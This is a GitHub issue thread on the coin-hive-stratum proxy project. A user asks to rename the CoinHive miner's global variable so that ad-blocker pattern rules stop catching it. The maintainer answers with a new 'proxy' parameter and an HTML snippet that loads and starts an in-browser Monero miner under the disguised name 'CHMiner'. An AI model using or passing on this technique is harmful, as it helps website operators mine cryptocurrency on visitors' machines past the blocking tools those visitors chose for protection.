### ISSUE TITLE
Can’t I change the variable name declaration (CoinHive) to other names (CHMiner) ?

### ISSUE THREAD

**Issue by bobbieltd** [cazala/coin-hive-stratum#38]
Hi !
Thank you alot for your projects. As in new deployment in now.sh, I think I can’t change the variable name which is CoinHive to another name. Can you make an option available to deploy with another name which isn’t CoinHive ?
Reason : to avoid pattern block ( CoinHive.Anonymous(...), CoinHive.User(...) .... )

**Comment by cazala** [comment]
Are you getting blocked by an AdBlock?

**Comment by cazala** [comment]
I added the ability to rename the global `CoinHive` variable by passing a value in the `proxy` parameter of the miner url, like this:

```html
<script src="https://proxy-khlizaweshj.now.sh/client?proxy=CHMiner"></script>
```

Now you can access the `CoinHive` object as `CHMiner`, like this:

```html
<script src="https://proxy-khlizaweshj.now.sh/client?proxy=CHMiner"></script>
<script>
  var miner = new CHMiner.Anonymous('YOUR_MONERO_ADDRESS');
  miner.start();
</script>
```
You will need to rebuild your instance or get a new proxy in order to use this feature
